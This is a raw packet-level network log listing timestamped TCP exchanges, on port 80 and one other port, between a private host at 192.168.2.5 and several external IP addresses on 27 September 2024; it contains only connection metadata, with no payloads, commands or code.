Sep 27, 2024 04:21:17.123493910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123495102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123502970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123512030 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123528004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123542070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123553038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123554945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123564959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123575926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123591900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123609066 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123620033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123631001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123653889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123668909 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123872042 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.123898983 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.123908997 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.123928070 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.123928070 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.123944044 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.123958111 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.123984098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.123984098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.124190092 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.124325037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124335051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124345064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124361992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.124382019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.124387026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124397993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124408007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124418974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124423027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.124445915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.124454975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.124471903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.124495983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.124891043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.124901056 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.124912024 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.124917030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.124932051 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.125086069 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.125523090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125560999 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125566959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125577927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125603914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125646114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125648975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125658035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125669956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125677109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125691891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125705957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125766993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125777006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125787020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125802994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125823975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125869989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125880003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125889063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125899076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125905037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125912905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125925064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125931978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125948906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.125961065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125983000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.125989914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126024961 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126048088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126058102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126066923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126076937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126086950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126116037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126123905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126140118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126151085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126159906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126162052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126173019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126192093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126214027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126221895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126234055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126245022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126266956 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126286983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126317978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126327991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126338005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126347065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126355886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126386881 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126427889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126437902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126447916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126461029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126467943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126472950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126497984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126523018 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126523018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126537085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.126559973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.126580000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.129708052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129746914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.129750967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129761934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129786968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.129805088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.129856110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129867077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129883051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129892111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129903078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129904985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.129941940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.129962921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129975080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129983902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129995108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.129997969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.130027056 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.130064011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.130074978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.130089045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.130096912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.130105019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.130132914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.135040045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135059118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135067940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135086060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.135104895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.135154963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135165930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135175943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135185957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135196924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.135216951 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.135225058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.135258913 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.136701107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136710882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136722088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136733055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136742115 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.136743069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136754990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136760950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.136769056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136779070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.136782885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.136814117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.157222033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157238960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157257080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157267094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157270908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157279015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157290936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157293081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157304049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157315016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157325029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157335997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157341957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157351017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157360077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157377005 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157388926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157398939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157402992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157411098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157421112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.157428980 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157448053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.157474995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.169406891 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:17.170712948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170722961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170733929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170758009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.170780897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.170783043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170794964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170805931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170816898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170819998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.170828104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.170850992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.170875072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.170943022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.170955896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.170967102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.170981884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.170993090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.171004057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.171008110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.171016932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.171035051 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.171061039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.171067953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.171080112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.171103954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.171130896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.173074961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173084021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173094988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173115015 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.173122883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173132896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173132896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.173146009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173167944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.173182964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.173207998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173218966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.173240900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.173255920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177293062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177333117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177341938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177351952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177377939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177387953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177392006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177400112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177409887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177423000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177437067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177447081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177448988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177480936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177923918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177952051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177958012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.177963972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.177983999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.178000927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.178006887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.178018093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.178029060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.178037882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.178039074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.178052902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.178054094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.178069115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.178073883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.178100109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179027081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179045916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179054976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179066896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179091930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179111004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179121017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179131985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179148912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179163933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179218054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179229975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179254055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179275990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179745913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179758072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179768085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179785013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179841042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179841995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179853916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179863930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179873943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179882050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.179883003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.179941893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180100918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180111885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180120945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180136919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180150032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180156946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180160999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180171967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180181980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180181980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180206060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180231094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180244923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180255890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180265903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180279016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180279970 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180294991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180299044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180314064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180320024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180344105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180360079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180370092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180380106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.180396080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.180423021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181015968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181027889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181039095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181050062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181065083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181080103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181092024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181102991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181113958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181123972 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181124926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181138992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181138992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181150913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181159973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181185961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181247950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181258917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181268930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181282043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181288958 CEST	80	49725	185.215.113.117	192.168.2.5
